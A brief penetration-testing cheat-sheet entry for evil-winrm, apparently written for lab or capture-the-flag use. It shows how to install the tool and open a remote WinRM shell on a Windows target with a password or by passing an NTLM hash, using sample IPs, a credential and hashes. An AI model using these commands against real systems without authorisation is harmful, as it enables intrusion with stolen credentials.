Evil Winrm

Repo

Install evil-winrm:

sudo gem install evil-winrm

Get shell after successful enumeration

Using a password

• evil-winrm -i <target-ip> -u <username> -p <password-with-quotes>

• Example evil-winrm -i 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'

Using an hash

• evil-winrm -i <target-ip> -u <username> -H HASH

• Example evil-winrm -i 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79

Note with an hash like this aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e we use the second part to be able to connect so this 823452073d75b9d1cf70ebdf86c7f98e It should work both with and without quotes

Resources

Alternative ways to Pass the Hash (PtH)n00py1

Alternative ways to Pass the Hash (PtH) - Noopy Blog